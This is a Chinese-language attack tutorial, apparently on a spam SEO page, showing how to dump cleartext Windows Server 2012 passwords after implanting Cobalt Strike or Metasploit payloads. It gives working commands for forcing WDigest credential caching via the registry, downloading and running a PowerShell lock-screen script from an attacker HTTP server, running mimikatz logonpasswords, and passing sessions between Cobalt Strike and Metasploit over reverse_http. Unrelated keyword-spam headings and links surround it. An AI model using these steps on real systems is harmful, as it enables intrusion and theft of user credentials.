当前位置: 首页 > news >正文

石家庄网站建设推广公司哪家好百度快照推广

石家庄网站建设推广公司哪家好,百度快照推广,企业网站建设是什么实现的物质基础和技术支撑,是一个网站或站点的第一个网页cs与msf权限传递以及mimikatz抓取win2012明文密码 使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上 1.cs生成木马并使目标服务器中马 建立监听生成木马 2.抓取目标主机的明文密码 通过修改注册表来让Wdigest Auth保存明文口令 shell …

cs与msf权限传递以及mimikatz抓取win2012明文密码

使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上

1.cs生成木马并使目标服务器中马

建立监听生成木马

2.抓取目标主机的明文密码

通过修改注册表来让Wdigest Auth保存明文口令

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

编写一个强制锁屏脚本

Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

在锁屏脚本目录下开启http服务器,控制目标服务器下载并执行锁屏脚本

shell powershell (new-object System.Net.WebClient).DownFile('http://192.168.17.132:9999/lock-screen.ps1','c:\lock-screen.ps1') #下载锁屏脚本
shell powershell c:\lock-screen.ps1 #执行锁屏脚本

管理员重新登录后再抓取明文密码

logonpasswords

cs抓取成功

3.打开Metasploit Framework

调用 exploit/multi/handler 模块配置 HTTP Payload,为该 payload 的 IP 和 端口设置成 Metasploit Framework 所在主机 IP,端口自定义即可。

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set 9980
run

4.在Cobalt Strike 上创建一个Foreign HTTP的监听

成功将cs的会话传递到msf上了

mimikatz抓取win2012明文密码

1.msf生成木马文件使服务器中马

shell #进入cmd窗口
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f #修改注册表
powershell  #进入powershell
c:\lock-screen.ps1 #运行强制锁屏脚本

上传mimikatz启动mimikatz获取明文密码

execute -i -f mimikatz.exe
sekurlsa::logonpasswords

这样mimikatz就抓取到了win2012的明文密码。

创建一个监听

background 
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set lport 8899
set disablepayloadhandler true
set prependmigrate true
set session 2 #根据自己的session值
exploit成功将msf的会话传递到cs上了。

http://www.dnsts.com.cn/news/184.html

相关文章:

  • 网站开发方案设计网站搭建详细教程
  • 西宁平台网站建设太原免费网站建站模板
  • 做外贸哪些网站好推广的公司
  • 做网站公司郑州引流推广接单
  • 余姚网站建设余姚最佳磁力搜索引擎
  • 做网站带来的好处seo优化网页
  • phpcms 网站路径百度帐号
  • 网站制作书籍推荐百度手机助手下载安卓版
  • 网站服务器做哪些安全措施网站百度不收录的原因
  • 怎么用代码做网站刷钻业务推广网站
  • 怎么做好网站推广域名网
  • 如何做网站企划案天津百度seo代理
  • 衡阳营养师报考网站中国疫情最新消息
  • 网站建设负责传资料不seoul是韩国哪个城市
  • 东明住房和城乡建设局网站上海官网seo
  • wap网站源码下载湖南平台网站建设制作
  • 江西网站建设公司哪家好html网页模板
  • 华亮建设集团股份有限公司网站灰色行业推广平台网站
  • 乐安网站建设willfast优化工具下载
  • 智慧团建网站初始密码公司网站建设平台
  • 外国的网站 ftp整合营销传播的六种方法
  • 大连建站公司产品推广的渠道
  • 华为做网站吗推广的公司
  • 做餐饮公司网站宁波网站建设推广公司价格
  • 网站内链优化百度seo优化推广
  • wordpress 多域名插件英文网站seo
  • 成都网站建设互联深圳做网站seo
  • 网站建设竞争对数分析重庆电子商务seo
  • 用手机如何做网站新手20种引流推广方法
  • 制作app的教程郑州seo培训班